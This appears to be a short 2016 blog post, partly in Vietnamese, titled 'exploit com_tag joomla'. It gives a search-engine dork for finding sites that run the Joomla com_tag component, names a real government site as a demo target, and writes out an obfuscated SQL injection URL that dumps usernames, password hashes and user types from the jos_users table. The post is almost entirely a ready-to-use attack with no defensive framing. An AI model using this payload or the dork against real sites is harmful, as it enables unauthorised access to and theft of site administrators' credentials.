Wednesday, July 6, 2016

exploit com_tag joomla

Dork 
inurl:index.php?option=com_tag
Demo : 
http://www.udc.gov.bb/index.php?option=c...&Itemid=18
Thay : index.php?option=com_tag&view=alltags&Itemid=18 
Thành : index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component